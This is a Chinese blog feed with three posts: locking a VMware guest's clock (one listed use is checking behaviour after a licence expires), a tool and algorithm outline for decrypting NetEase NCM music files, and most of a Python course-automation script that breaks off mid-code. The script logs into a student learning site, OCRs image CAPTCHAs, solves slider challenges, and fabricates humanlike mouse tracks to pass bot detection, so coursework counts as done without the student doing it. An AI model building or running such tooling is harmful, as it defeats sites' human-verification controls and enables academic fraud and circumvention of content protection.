VMware 创建快照后锁定系统时间

VMware 创建快照后锁定系统时间 /archives/tools/vmware-snapshot-lock-time.html 📋 问题描述

在使用 VMware 虚拟机时，我们经常需要创建快照来保存系统的特定状态。但是，当我们从指定快照恢复启动后，虚拟机的系统时间会自动同步到当前真实时间，而不是我们期望的快照时刻的时间。

典型场景：

测试软件在不同时间的行为
验证许可证过期后的功能
复现特定时间点的问题
教学演示需要固定时间环境

为了解决这个问题，我们需要禁用 VMware 的时间同步功能，并设置固定的启动时间。

🔧 解决方案

步骤 1：关闭 Windows 网络时间同步

首先，进入虚拟机内的 Windows 系统，关闭从网络自动同步时间的功能：

右键点击任务栏右下角的时间
选择”调整日期/时间”
关闭”自动设置时间”选项

关闭网络时间同步

注意：此步骤确保操作系统不会主动从网络时间服务器同步时间。

步骤 2：修改 VMware 配置文件

找到虚拟机的配置文件（.vmx 文件），通常位于虚拟机所在目录，文件名与虚拟机名称相同。

2.1 禁用时间同步

在 .vmx 文件末尾添加以下配置：

time.synchronize.continue = "FALSE"
time.synchronize.restore = "FALSE"
time.synchronize.resume.disk = "FALSE"
time.synchronize.shrink = "FALSE"
time.synchronize.tools.startup = "FALSE"

配置说明：

time.synchronize.continue：禁用持续的时间同步
time.synchronize.restore：禁用从快照恢复时的时间同步
time.synchronize.resume.disk：禁用从磁盘恢复时的时间同步
time.synchronize.shrink：禁用磁盘收缩时的时间同步
time.synchronize.tools.startup：禁用 VMware Tools 启动时的时间同步

2.2 设置固定启动时间

添加以下配置来设置虚拟机启动时的初始时间：

rtc.startTime = "1780252200"

参数说明：

rtc.startTime：设置虚拟机 RTC（实时时钟）的启动时间
后面的数字是 Unix 时间戳（从 1970年1月1日 00:00:00 UTC 开始的秒数）

2.3 获取时间戳

你需要将期望的时间转换为 Unix 时间戳。可以使用以下在线工具：

示例：

2026-05-30 12:30:00 → 1780252200
2025-01-01 00:00:00 → 1735689600
2024-12-25 08:00:00 → 1735113600

步骤 3：创建新快照

完成配置文件修改后：

保存并关闭 .vmx 文件
启动虚拟机（此时时间应该为你设置的时间）
验证时间是否正确
创建一个新的快照，保存这个状态

现在，每次从这个快照恢复时，虚拟机的时间都会保持在你设定的时刻。

⚙️ 高级配置选项

仅禁用特定场景的时间同步

如果你不需要完全禁用时间同步，可以只禁用特定场景：

# 仅禁用快照恢复时的时间同步
time.synchronize.restore = "FALSE"

# 保持其他时间同步功能启用
time.synchronize.continue = "TRUE"

使用 BIOS 时间而非主机时间

bios.forceSetupOnce = "FALSE"
rtc.useLocalTime = "TRUE"

禁用 VMware Tools 时间同步

如果安装了 VMware Tools，还需要在虚拟机内部禁用：

Windows 虚拟机：

打开注册表编辑器（regedit）
导航到：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VMMEMCTL
创建或修改 DWORD 值：DisableTimeSync = 1

Linux 虚拟机：
编辑 /etc/vmware-tools/tools.conf：

[timeSync]
enable = false

❓ 常见问题

Q1: 修改配置后时间仍然同步怎么办？

A: 请检查以下几点：

确认虚拟机已完全关闭（不是挂起状态）
确认 .vmx 文件已正确保存
尝试删除 .lck 锁定文件夹后重新启动
检查 VMware Tools 是否启用了时间同步

Q2: 如何恢复时间同步功能？

A: 将配置文件中的所有 FALSE 改回 TRUE，或删除这些配置行：

time.synchronize.continue = "TRUE"
time.synchronize.restore = "TRUE"
time.synchronize.resume.disk = "TRUE"
time.synchronize.shrink = "TRUE"
time.synchronize.tools.startup = "TRUE"

Q3: 时间戳计算错误导致时间不对？

确认使用的是秒级 Unix 时间戳（10位数字）
注意时区差异，时间戳是基于 UTC 时间的
使用在线工具验证时间戳是否正确

Q4: 可以在运行时动态修改时间吗？

A: 不建议在虚拟机运行时修改 .vmx 文件。正确的做法是：

关闭虚拟机
修改配置文件
重新启动虚拟机

Q5: 这个配置会影响性能吗？

A: 不会影响性能。禁用时间同步只是阻止 VMware 自动调整虚拟机时间，对 CPU、内存和磁盘性能没有任何影响。

💡 使用建议

测试环境专用：此配置主要用于测试和开发环境，生产环境建议保持时间同步以确保日志和认证的准确性
记录时间戳：建议在文档中记录你使用的时间戳对应的实际时间，方便后续维护
定期验证：定期检查虚拟机时间是否符合预期，特别是在更新 VMware 版本后
备份配置：修改 .vmx 文件前，建议先备份原文件
结合快照管理：可以为不同的测试场景创建多个快照，每个快照对应不同的时间点

📌 注意事项

⚠️ 重要提醒：

禁用时间同步可能导致某些依赖准确时间的应用程序出现问题
SSL/TLS 证书验证可能因时间不准确而失败
Kerberos 认证等安全协议需要准确的时间同步
日志文件的时间戳可能与实际时间不符，排查问题时需注意
仅在有明确需求时才禁用时间同步，测试完成后建议恢复

🔗 相关资源

]]> tools VMware 快照系统时间时间同步网易云音乐 NCM转mp3 /archives/tools/163music-ncm-decode.html 使用网易云客户端下载的音乐，有一些是ncm格式的，不是mp3格式，直接复制这个ncm到其他设备是无法播放的，需要转成mp3等音频格式，
这是一个将ncm转mp3的软件
项目地址

https://github.com/urldecode/ncmdump-gui

图片

图 0

图 2

🔐 核心算法原理

NCM 文件格式是网易云音乐的专有加密格式，其解密过程包含多个步骤：

1. 文件头验证

每个 NCM 文件以固定的 8 字节魔数开头：

CTENFDAM

程序首先读取前 8 字节进行验证，确保文件格式正确。

2. 密钥数据解密

密钥数据经过两层加密保护：

第一层：XOR 解密

使用固定密钥 0x64 对密钥数据进行逐字节 XOR 运算。

第二层：AES-ECB 解密

使用预定义的 AES 密钥进行 ECB 模式解密。

PKCS7 去填充

解密后的数据需要进行 PKCS7 去填充处理，提取实际的音频解密密钥（跳过前 17 字节）。

3. 元数据解密

元数据包含歌曲信息（歌名、歌手、专辑等），经过三层加密：

第一层：XOR 解密

使用密钥 0x63 进行 XOR 运算。

第二层：Base64 解码

跳过前缀 "163 key(Don't modify):"（22 字节）后，进行 Base64 解码。

第三层：AES-ECB 解密

使用元数据专用密钥进行 AES-ECB 解密。

PKCS7 去填充与 JSON 解析

去填充后跳过 "music:" 前缀（6 字节），得到 JSON 格式的元数据。

4. 音频数据解密

音频数据使用 RC4-like 流密码进行加密，对每个音频数据块进行逐字节 XOR 解密。

5. 文件结构偏移

在读取音频数据之前，需要跳过以下部分：

CRC32 校验码：4 字节
保留字节：5 字节
封面图片长度：4 字节
封面图片数据：可变长度

📝 功能使用说明

快速开始

启动程序
- 双击 ncmdump-gui.exe 运行
选择文件
-点击 “📁 选择 NCM 文件” 按钮，选择一个或多个 NCM 文件
- 或点击 “📂 选择目录” 按钮，扫描整个目录下的所有 NCM 文件
设置输出目录
- 点击 “浏览…” 按钮，选择解密后文件的保存位置
配置选项
- 勾选 “自动复制同名 .lrc 歌词文件”（默认开启）
- 如有同名歌词文件，将自动复制到输出目录
开始解密
- 点击 “开始解密” 按钮
- 等待处理完成，查看解密结果

界面功能说明

文件列表区域

显示已选择的所有 NCM 文件
点击 “×” 按钮可移除单个文件
点击 “🗑️ 清空列表” 可清除所有文件

进度显示

解密过程中显示实时进度条
显示当前正在处理的文件名

结果展示

成功：绿色卡片，显示音频格式和输出路径
失败：红色卡片，显示错误原因
统计：显示成功/失败数量和歌词复制数量
点击 “🗑️ 清除结果” 可清空历史记录

常见问题

Q: 为什么解密后的 MP3 文件无法播放？
A: 请确认：

原始 NCM 文件未损坏
输出目录有写入权限
检查错误提示信息

Q: 如何解密整个音乐文件夹？
A: 点击”选择目录”按钮，选择包含 NCM 文件的文件夹，程序会自动扫描所有子目录。

Q: 歌词文件没有复制怎么办？
A: 请确认：

歌词文件与 NCM 文件同名（仅扩展名不同）
歌词文件在同一目录下
已勾选”自动复制同名 .lrc 歌词文件”选项

Q: 可以在 macOS 或 Linux 上使用吗？
A: 当前仅提供 Windows 版本。如需跨平台支持，可使用源代码重新编译。

✨ 主要特性

1. 单文件分发，零依赖运行

编译为单个 .exe 文件（约 11 MB）
无需安装 Go、Node.js、Python 或其他运行时
Windows 系统自带 WebView2，开箱即用

2. 批量解密与目录扫描

支持逐个添加文件
支持递归扫描整个目录树
自动识别所有 .ncm 文件（不区分大小写）
智能去重，避免重复处理

3. 歌词文件自动复制

自动检测同名的 .lrc 歌词文件
复制到输出目录，保持与音频文件相同的名称
可手动开启/关闭此功能

4. 现代化 GUI 界面

基于 Vue 3 + Wails 构建
蓝紫色渐变背景，视觉效果出色
实时进度条显示
详细的解密结果统计
响应式设计，操作流畅

5. 完善的错误处理

文件格式验证
详细的错误提示信息
失败文件不影响其他文件的处理
清晰的日志记录

]]> tools 网易云音乐 163 ncm mp3 学起自动化学习/刷课 /archives/tools/xueqiplus-auto-learning.html 之前我写了一个python的刷课脚本，手动的地方比较多，在AI的加持下，对项目进行了重写，只需要添加三个地方

1. base_url, 学习系统地址 47行
1. username 学号 50行
1. password 密码 51行

修改的地方如下图

脚本会自动进行登陆，自动识别验证码，如果有滑块人机验证会自动进行验证，

完整代码如下
github仓库地址
https://github.com/urldecode/xueqiplus-auto-leaning

import requests
import time
import json
import random
from PIL import Image
from io import BytesIO
import base64
try:
    import ddddocr
    OCR_AVAILABLE = True
except ImportError:
    OCR_AVAILABLE = False
    print("警告: 未安装ddddocr库，验证码识别功能将不可用")
    print("请运行: pip install ddddocr")


try:
    from captcha_recognizer.slider import Slider
    CAPTCHA_RECOGNIZER_AVAILABLE = True
    print("✓ captcha-recognizer 已加载，支持自动识别滑块缺口")
except ImportError:
    CAPTCHA_RECOGNIZER_AVAILABLE = False
    print("⚠ 未安装captcha-recognizer，将使用手动方式识别缺口")
    print("  安装命令: pip install captcha-recognizer")

session = requests.Session()


USE_PROXY = False  # 设置为 True 启用代理
PROXY_CONFIG = {
    "http": "http://127.0.0.1:8083",
    "https": "http://127.0.0.1:8083",
}

if USE_PROXY:
    session.proxies.update(PROXY_CONFIG)
    # 禁用SSL验证（如果使用mitmproxy等需要）
    session.verify = False
    from urllib3.exceptions import InsecureRequestWarning
    import warnings
    warnings.filterwarnings('ignore', category=InsecureRequestWarning)
    print(f"✓ HTTP代理已启用: {PROXY_CONFIG['http']}")
    print("  提示: 请确保代理工具正在运行")

# 基础URL
# BASE_URL = "https://swfucce.sccchina.net"
BASE_URL = "https://修改为学生学习系统地址"

# 用户配置 - 请修改为你的实际账号密码
USERNAME = "xxxxxx"  # 学号
PASSWORD = "xxxxxx"  # 密码

# 全局变量存储动态参数（将从 /student/ 页面自动获取）
edu_token = None
edu_sign = None  # eduSign可能需要手动配置或从其他接口获取
edu_cid = None
user_account_id = None  # 从页面自动获取

# 如果知道eduSign的值，可以在这里配置（从浏览器F12抓包获取）
# 例如: EDU_SIGN_CONFIG = "b9f1ee591cf8610654aa076cb30c8173"
EDU_SIGN_CONFIG = None  # 设置为None则不添加eduSign字段


def create_base_headers(content_type=None, extra_headers=None):
    """
    创建基础请求头
    
    参数:
        content_type: Content-Type，如 'application/json' 或 'application/x-www-form-urlencoded'
        extra_headers: 额外的header字典
    
    返回:
        完整的headers字典
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0",
        "X-Requested-With": "XMLHttpRequest",
        "Origin": BASE_URL,
        "Referer": f"{BASE_URL}/",
    }
    
    if content_type:
        headers["Content-Type"] = content_type
    
    if extra_headers:
        headers.update(extra_headers)
    
    return headers


def create_api_headers(content_type="application/json", extra_headers=None):
    """
    创建API请求头（包含eduToken等认证信息）
    
    参数:
        content_type: Content-Type
        extra_headers: 额外的header字典
    
    返回:
        完整的headers字典
    """
    headers = create_base_headers(content_type=content_type, extra_headers=extra_headers)
    
    # 添加认证相关的header
    if user_account_id:
        headers["eduUId"] = user_account_id
    if edu_token:
        headers["eduToken"] = edu_token
    if edu_cid:
        headers["eduCId"] = edu_cid
    
    # 添加eduSign
    if EDU_SIGN_CONFIG:
        headers["eduSign"] = EDU_SIGN_CONFIG
    elif edu_sign:
        headers["eduSign"] = edu_sign
    
    return headers

def get_verify_code():
    """获取验证码图片和VERIFYCODE cookie"""
    # 生成随机数，模拟前端行为
    timestamp = int(time.time() * 1000)
    verify_url = f"{BASE_URL}/verifycode?{timestamp}"
    
    headers = create_base_headers()
    
    response = session.get(verify_url, headers=headers)
    
    if response.status_code == 200:
        # 保存验证码图片用于调试
        with open("verify_code.png", "wb") as f:
            f.write(response.content)
        print("验证码图片已保存到 verify_code.png")
        
        # 尝试自动识别验证码
        if OCR_AVAILABLE:
            try:
                ocr = ddddocr.DdddOcr(show_ad=False)
                code = ocr.classification(response.content)
                print(f"自动识别验证码: {code}")
                return code
            except Exception as e:
                print(f"自动识别失败: {e}")
        

    else:
        raise Exception(f"获取验证码失败: {response.status_code}")


def handle_slider_captcha():
    """
    处理滑块验证码
    返回验证成功后的captcha id
    """
    print("\n检测到滑块验证码，开始处理...")
    
    # 记录请求滑块验证码的时间（作为startSlidingTime）
    import datetime
    start_sliding_time = datetime.datetime.now(datetime.timezone.utc)
    
    # 第1步：获取滑块验证码
    gen_url = f"{BASE_URL}/student/dispatch/captcha/gen?type=RANDOM"
    
    headers = create_base_headers(content_type="application/json;charset=UTF-8")
    
    response = session.post(gen_url, headers=headers, json={})
    
    if response.status_code != 200:
        print(f"✗ 获取滑块验证码失败: {response.status_code}")
        return None
    
    captcha_data = response.json()
    captcha_id = captcha_data.get('id')
    captcha_info = captcha_data.get('captcha', {})
    
    if not captcha_id or captcha_info.get('type') != 'SLIDER':
        print("✗ 不是滑块验证码类型")
        return None
    
    print(f"✓ 获取到滑块验证码 ID: {captcha_id}")
    
    # 第2步：解析背景图片
    bg_image_base64 = captcha_info.get('backgroundImage', '')
    if not bg_image_base64:
        print("✗ 未找到背景图片")
        return None
    
    # 移除data:image/jpeg;base64,前缀
    if ',' in bg_image_base64:
        bg_image_base64 = bg_image_base64.split(',')[1]
    
    # 解码base64图片
    try:
        bg_image_data = base64.b64decode(bg_image_base64)
        
        # 保存图片用于调试
        with open("slider_captcha_bg.png", "wb") as f:
            f.write(bg_image_data)
        print("✓ 背景图片已保存到 slider_captcha_bg.png")
        
        # 打开图片获取尺寸
        bg_image = Image.open(BytesIO(bg_image_data))
        bg_width, bg_height = bg_image.size
        print(f"   图片尺寸: {bg_width}x{bg_height}")
        
    except Exception as e:
        print(f"✗ 解析图片失败: {e}")
        return None
    
    # 第3步：识别缺口位置（仅支持自动识别）
    if not CAPTCHA_RECOGNIZER_AVAILABLE:
        print("\n✗ 错误: 未安装captcha-recognizer库，无法自动识别缺口")
        print("请运行: pip install captcha-recognizer")
        return None
    
    slider_offset = None
    
    print("\n使用captcha-recognizer自动识别缺口位置...")
    try:
        # 缩放到300宽度进行识别（提高速度且保持准确性）
        target_width = 300
        original_img = Image.open("slider_captcha_bg.png")
        original_width, original_height = original_img.size
        
        # 计算缩放比例
        scale_ratio = target_width / original_width
        target_height = int(original_height * scale_ratio)
        
        # 缩放图片
        scaled_img = original_img.resize((target_width, target_height), Image.Resampling.LANCZOS)
        scaled_path = "slider_captcha_scaled.png"
        scaled_img.save(scaled_path)
        print(f"   图片已缩放: {original_width}x{original_height} -> {target_width}x{target_height} (比例: {scale_ratio:.2f})")
        
        # 识别缩放后的图片
        slider = Slider()
        result = slider.identify(scaled_path)
        
        if result:
            box, confidence = result
            
            if confidence > 0.5:
                # box格式: [x1, y1, x2, y2]，取左上角x坐标
                gap_x_scaled = box[0]
                print(f"✓ 自动识别成功！缺口坐标（缩放图）: {box}, 可信度: {confidence:.4f}")
                
                # 将缩放图坐标转换回原始图片坐标
                gap_x_original = int(gap_x_scaled / scale_ratio)
                
                # 最终转换为300宽度的坐标（用于滑块验证）
                slider_offset = int(gap_x_scaled) - 5
                print(f"✓ 坐标转换: {gap_x_scaled:.2f}px (缩放图) -> {gap_x_original}px (原始图) -> {slider_offset}px (验证用)")
            else:
                print(f"✗ 自动识别可信度过低 ({confidence:.4f} < 0.5)，验证失败")
                return None
        else:
            print("✗ 自动识别失败，未返回结果")
            return None
    except Exception as e:
        print(f"✗ 自动识别失败: {e}")
        import traceback
        traceback.print_exc()
        return None
    
    print(f"✓ 确定缺口位置: {slider_offset}px")
    
    # 第4步：生成滑动轨迹（总时长约2000ms）
    track_list = generate_slider_track(slider_offset)
    
    # 第5步：提交验证
    check_url = f"{BASE_URL}/student/dispatch/captcha/check"
    
    # 使用轨迹的总时长作为实际滑动时间（约2000ms）
    # 不再使用实际的识别时间，因为识别过程很快（约600ms）会导致轨迹时间被压缩
    track_total_duration = track_list[-1]['t'] if track_list else 2000
    
    # 计算开始时间和结束时间（使用轨迹时长）
    end_sliding_time = start_sliding_time + datetime.timedelta(milliseconds=track_total_duration)
    
    # 格式化时间为 ISO 8601
    start_time_str = start_sliding_time.strftime("%Y-%m-%dT%H:%M:%S.") + f"{start_sliding_time.microsecond // 1000:03d}Z"
    end_time_str = end_sliding_time.strftime("%Y-%m-%dT%H:%M:%S.") + f"{end_sliding_time.microsecond // 1000:03d}Z"
    
    # 准备提交验证的 header（使用基础header + 额外字段）
    check_headers = create_base_headers(
        content_type="application/json;charset=UTF-8",
        extra_headers={
            "sec-ch-ua-platform": "\"Windows\"",
            "Accept": "application/json, text/javascript, */*; q=0.01",
            "sec-ch-ua": "\"Chromium\";v=\"146\", \"Not-A.Brand\";v=\"24\", \"Microsoft Edge\";v=\"146\"",
            "Accept-Encoding": "gzip, deflate, br, zstd",
            "Accept-Language": "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6",
        }
    )
    
    # 使用缩放后的图片尺寸（300x180），与识别时使用的尺寸一致
    scaled_width = 300
    scaled_height = 180
    
    check_data = {
        "id": captcha_id,
        "data": {
            "bgImageWidth": scaled_width,  # 使用缩放后的宽度300
            "bgImageHeight": scaled_height,  # 使用缩放后的高度180
            "sliderImageWidth": 55,  # 滑块宽度（固定值）
            "sliderImageHeight": scaled_height,  # 使用缩放后的高度180
            "startSlidingTime": start_time_str,
            "endSlidingTime": end_time_str,
            "trackList": track_list
        }
    }
    
    print("正在提交验证...")
    print(f"调试信息: 缩放图片尺寸={scaled_width}x{scaled_height}, 原始尺寸={bg_width}x{bg_height}, 偏移量={slider_offset}, 轨迹点数={len(track_list)}")
    print(f"时间范围: {start_time_str} -> {end_time_str}")
    print(f"轨迹时间范围: 0 -> {track_list[-1]['t']}ms")
    
    # 打印请求数据用于调试（只打印前几个轨迹点）
    import json as json_module
    debug_data = {
        "id": captcha_id,
        "data": {
            "bgImageWidth": scaled_width,
            "bgImageHeight": scaled_height,
            "sliderImageWidth": 55,
            "sliderImageHeight": scaled_height,
            "startSlidingTime": start_time_str,
            "endSlidingTime": end_time_str,
            "trackList": track_list[:3] + ["..."] + track_list[-2:]  # 只显示前后几个点
        }
    }
    print(f"请求数据: {json_module.dumps(debug_data, ensure_ascii=False, indent=2)[:500]}")
    
    response = session.post(check_url, headers=check_headers, json=check_data)
    
    if response.status_code != 200:
        print(f"✗ 验证请求失败: {response.status_code}")
        print(f"响应内容: {response.text[:500]}")
        print(f"\n提示: 400错误通常是数据格式问题，请检查:")
        print(f"  1. 图片尺寸是否正确 (缩放: {scaled_width}x{scaled_height}, 原始: {bg_width}x{bg_height})")
        print(f"  2. 滑块宽度是否为55")
        print(f"  3. 时间格式是否为ISO 8601")
        print(f"  4. 轨迹点的t字段是否为相对时间")
        print(f"  5. Header是否完整")
        return None
    
    result = response.json()
    
    if result.get('success') and result.get('code') == 200:
        new_captcha_id = result.get('data', {}).get('id')
        print(f"✓ 滑块验证成功！新的captcha ID: {new_captcha_id}")
        return new_captcha_id
    else:
        print(f"✗ 验证失败: {result.get('msg', '未知错误')}")
        return None


def generate_slider_track(target_offset):
    """
    生成拟人化的滑动轨迹（总时长约2秒，时间分布更线性）
    
    参数:
        target_offset: 目标偏移量（像素）
    
    返回:
        轨迹点列表（t为相对时间，从0开始）
    """
    track_list = []
    current_x = 0
    current_y = 0
    elapsed_time = 0  # 相对时间，从0开始
    
    # 第1个点：鼠标按下 (t=0)
    track_list.append({
        "x": 0,
        "y": 0,
        "type": "down",
        "t": 0
    })
    
    # 生成移动轨迹（总时长约2000ms，更线性的时间分布）
    steps = random.randint(25, 35)  # 步数
    remaining = target_offset
    
    for i in range(steps):
        # 计算这一步的距离（匀速为主，轻微变速）
        if i < steps * 0.7:  # 前70%匀速移动
            step_distance = remaining / (steps - i) * random.uniform(1.2, 1.8)
        elif i < steps * 0.9:  # 中间减速
            step_distance = remaining / (steps - i) * random.uniform(0.8, 1.2)
        else:  # 最后微调
            step_distance = remaining / (steps - i) * random.uniform(0.4, 0.8)
        
        step_distance = min(step_distance, remaining)
        current_x += int(step_distance)
        remaining -= step_distance
        
        # 添加轻微的y轴抖动（模拟手抖）
        current_y = random.randint(-1, 1)
        
        # 时间间隔（毫秒）- 更线性的分布，总时长约2000ms
        if i < steps * 0.7:
            time_interval = random.randint(50, 70)  # 匀速阶段
        elif i < steps * 0.9:
            time_interval = random.randint(60, 80)  # 减速阶段
        else:
            time_interval = random.randint(70, 90)  # 微调阶段
        
        elapsed_time += time_interval
        
        track_list.append({
            "x": current_x,
            "y": current_y,
            "type": "move",
            "t": elapsed_time
        })
    
    # 确保最后到达目标位置
    if current_x != target_offset:
        current_x = target_offset
        elapsed_time += random.randint(50, 80)
        track_list.append({
            "x": current_x,
            "y": current_y,
            "type": "move",
            "t": elapsed_time
        })
    
    # 最后一个点：鼠标释放（停留一会儿，让总时长接近2000ms）
    # 如果当前时间不足1800ms，补充到1800-2000ms
    if elapsed_time < 1800:
        elapsed_time = random.randint(1800, 2000)
    else:
        elapsed_time += random.randint(50, 150)
    
    track_list.append({
        "x": current_x,
        "y": current_y,
        "type": "up",
        "t": elapsed_time
    })
    
    return track_list


def encode_password(password):
    """将密码转换为URL编码格式（ASCII码逗号分隔）"""
    encoded = ",".join([str(ord(c)) for c in password])
    return encoded


def encode_username(username):
    """将用户名转换为URL编码格式（ASCII码逗号分隔）"""
    encoded = ",".join([str(ord(c)) for c in username])
    return encoded


def login():
    """执行登录流程"""
    global edu_token, edu_sign, edu_cid, user_account_id
    
    print("="*50)
    print("开始登录流程...")
    print("="*50)
    
    # 第一步：访问首页获取初始cookie
    print("\n[1/4] 访问首页获取初始Cookie...")
    headers = create_base_headers()
    session.get(f"{BASE_URL}/", headers=headers)
    
    # 第二步：获取验证码
    print("\n[2/4] 获取验证码...")
    verify_code = get_verify_code()
    
    if not verify_code:
        raise Exception("验证码获取失败")
    
    # 第三步：准备登录数据
    print("\n[3/4] 准备登录数据...")
    encoded_username = encode_username(USERNAME)
    encoded_password = encode_password(PASSWORD)
    
    login_data = {
        "UserName": encoded_username,
        "Password": encoded_password,
        "Code": verify_code
    }
    
    print(f"用户名(编码后): {encoded_username}")
    print(f"密码(编码后): {encoded_password}")
    print(f"验证码: {verify_code}")
    
    # 第四步：发送登录请求
    print("\n[4/4] 发送登录请求...")
    login_url = f"{BASE_URL}/login"
    
    login_headers = create_base_headers(
        content_type="application/x-www-form-urlencoded; charset=UTF-8",
        extra_headers={
            "Host": "swfucce.sccchina.net",
            "Accept": "application/json, text/javascript, */*; q=0.01",
            "eduRefUrl": f"{BASE_URL}/",
        }
    )
    
    response = session.post(login_url, headers=login_headers, data=login_data)
    
    print(f"\n登录响应状态码: {response.status_code}")
    print(f"登录响应内容: {response.text}")
    
    # 解析响应
    try:
        result = response.json()
        
        if result.get("code") == 1:
            print("\n✓ 登录成功！")
            
            # 提取重要信息
            if "data" in result and "eduCId" in result["data"]:
                edu_cid = result["data"]["eduCId"]
                print(f"eduCId: {edu_cid}")
            
            # 打印Cookie信息
            print("\n当前Cookie:")
            for cookie in session.cookies:
                print(f"  {cookie.name}: {cookie.value}")
            
            # 获取后续请求需要的token和sign
            update_dynamic_params()
            
            return True
        else:
            error_msg = result.get("message", "未知错误")
            print(f"\n✗ 登录失败: {error_msg}")
            return False
            
    except Exception as e:
        print(f"\n✗ 解析登录响应失败: {e}")
        return False


def update_dynamic_params():
    """从 /student/ 页面更新动态参数 eduToken、eduCId、userId 等"""
    global edu_token, edu_sign, edu_cid, user_account_id
    
    print("\n正在从学生主页获取动态参数...")
    
    # 访问学生主页（登录响应中已包含重定向URL）
    student_url = f"{BASE_URL}/student/"
    
    headers = create_base_headers(
        extra_headers={
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
        }
    )
    
    response = session.get(student_url, headers=headers)
    
    if response.status_code == 200:
        html_content = response.text
        
        # 调试：保存HTML到文件以便分析
        with open("student_page_debug.html", "w", encoding="utf-8") as f:
            f.write(html_content)
        print("已保存页面HTML到 student_page_debug.html")
        
        # 使用正则表达式提取 cxt 对象中的关键信息
        import re
        
        # 提取 eduToken - 支持压缩和格式化两种JSON格式
        token_patterns = [
            r'"eduToken"\s*:\s*"([^"]+)"',  # "eduToken":"xxx" (压缩格式)
            r'eduToken\s*:\s*["\']([^"\']+)["\']',  # eduToken: "xxx" (格式化)
        ]
        
        edu_token = None
        for pattern in token_patterns:
            token_match = re.search(pattern, html_content)
            if token_match:
                edu_token = token_match.group(1)
                break
        
        if edu_token:
            print(f"✓ eduToken: {edu_token}")
        else:
            print("✗ 未找到 eduToken")
            print("提示: 请检查 student_page_debug.html 文件确认页面结构")
        
        # 提取 eduCId - 支持两种格式
        cid_patterns = [
            r'cxt\.eduCId\s*=\s*["\']([^"\']+)["\']',  # cxt.eduCId = "xxx"
            r'"eduCId"\s*:\s*"([^"]+)"',  # "eduCId":"xxx" (压缩格式)
        ]
        
        edu_cid_local = None
        for pattern in cid_patterns:
            cid_match = re.search(pattern, html_content)
            if cid_match:
                edu_cid_local = cid_match.group(1)
                break
        
        if edu_cid_local:
            edu_cid = edu_cid_local
            print(f"✓ eduCId: {edu_cid}")
        else:
            print("✗ 未找到 eduCId")
        
        # 提取 userId (即 userAccountId) - 支持多种格式
        userid_patterns = [
            r'"userId"\s*:\s*"([^"]+)"',  # "userId":"xxx" (压缩格式)
            r'userId\s*:\s*["\']([^"\']+)["\']',  # userId: "xxx" (格式化)
            r'"userAccountId"\s*:\s*"([^"]+)"',  # "userAccountId":"xxx"
        ]
        
        user_account_id = None
        for pattern in userid_patterns:
            userid_match = re.search(pattern, html_content)
            if userid_match:
                user_account_id = userid_match.group(1)
                break
        
        if user_account_id:
            print(f"✓ userId (userAccountId): {user_account_id}")
        else:
            print("✗ 未找到 userId")
            print("提示: 请检查 student_page_debug.html 文件确认字段名")
        
        # 提取 userName
        username_patterns = [
            r'"userName"\s*:\s*"([^"]+)"',  # "userName":"xxx" (压缩格式)
            r'userName\s*:\s*["\']([^"\']+)["\']',  # userName: "xxx" (格式化)
        ]
        
        for pattern in username_patterns:
            username_match = re.search(pattern, html_content)
            if username_match:
                print(f"✓ 用户名: {username_match.group(1)}")
                break
        
        # 提取 stationId
        station_patterns = [
            r'"stationId"\s*:\s*"([^"]+)"',  # "stationId":"xxx" (压缩格式)
            r'stationId\s*:\s*["\']([^"\']+)["\']',  # stationId: "xxx" (格式化)
        ]
        
        for pattern in station_patterns:
            station_match = re.search(pattern, html_content)
            if station_match:
                print(f"✓ stationId: {station_match.group(1)}")
                break
        
        # 尝试从 HTML 或 JS 文件中查找 eduSign
        # 注意：eduSign 可能不在 student 页面中，需要从其他地方获取
        sign_patterns = [
            r'"?eduSign"?\s*[:=]\s*["\']([^"\']+)["\']',
            r'edusign\s*[:=]\s*["\']([^"\']+)["\']',
        ]
        
        for pattern in sign_patterns:
            sign_match = re.search(pattern, html_content, re.IGNORECASE)
            if sign_match:
                edu_sign = sign_match.group(1)
                print(f"✓ eduSign: {edu_sign}")
                break
        
        if not edu_sign:
            print("⚠ 未在页面中找到 eduSign")
            print("提示: eduSign 可能需要从其他接口获取或手动配置")
        
        # 验证是否成功获取所有必要参数
        if edu_token and edu_cid and user_account_id:
            print("\n✓ 所有动态参数获取成功！")
            return True
        else:
            print("\n✗ 部分参数获取失败，请检查页面结构是否变化")
            print(f"   edu_token: {'✓' if edu_token else '✗'}")
            print(f"   edu_cid: {'✓' if edu_cid else '✗'}")
            print(f"   user_account_id: {'✓' if user_account_id else '✗'}")
            return False
    else:
        print(f"✗ 访问学生主页失败: {response.status_code}")
        print(f"响应内容: {response.text[:200]}")
        return False
        

def get_course_list():
    """获取课程列表"""
    print("\n" + "="*50)
    print("获取课程列表...")
    print("="*50)
    
    # 验证必要参数是否已获取
    if not all([edu_token, edu_cid, user_account_id]):
        print("错误: 动态参数未完全获取，请先确保登录成功")
        return []
    
    url = f"{BASE_URL}/student/student/coursestudy/getlist"
    
    headers = create_api_headers(
        content_type="application/json",
        extra_headers={
            "Host": "swfucce.sccchina.net",
            "metadataCode": "Student_StudentHome",
            "eduRefUrl": f"{BASE_URL}/student/",
        }
    )
    
    data = json.dumps({"data": "aggregation"}, separators=(',', ':'))
    
    response = session.post(url, headers=headers, data=data)
    
    print(f"响应状态码: {response.status_code}")
    
    # 如果收到403，检查是否需要滑块验证
    if response.status_code == 403:
        response_text = response.text
        print(f"收到403错误，响应内容: {response_text[:200]}")
        
        # 检查是否是403.5（需要滑块验证）
        if '403.5' in response_text or 'robot' in response_text.lower():
            print("\n检测到需要滑块验证（403.5）")
            print("开始处理滑块验证码...\n")
            
            # 处理滑块验证
            captcha_id = handle_slider_captcha()
            
            if captcha_id:
                print("✓ 滑块验证成功，重新获取课程列表...\n")
                # 验证成功后，重新请求课程列表
                response = session.post(url, headers=headers, data=data)
                print(f"重试后响应状态码: {response.status_code}")
            else:
                print("✗ 滑块验证失败")
                return []
        else:
            print("403错误，但不是滑块验证问题")
            return []
    
    if response.status_code == 200:
        try:
            result = response.json()
            if "items" in result:
                courses = result["items"]
                print(f"\n共获取到 {len(courses)} 门课程")
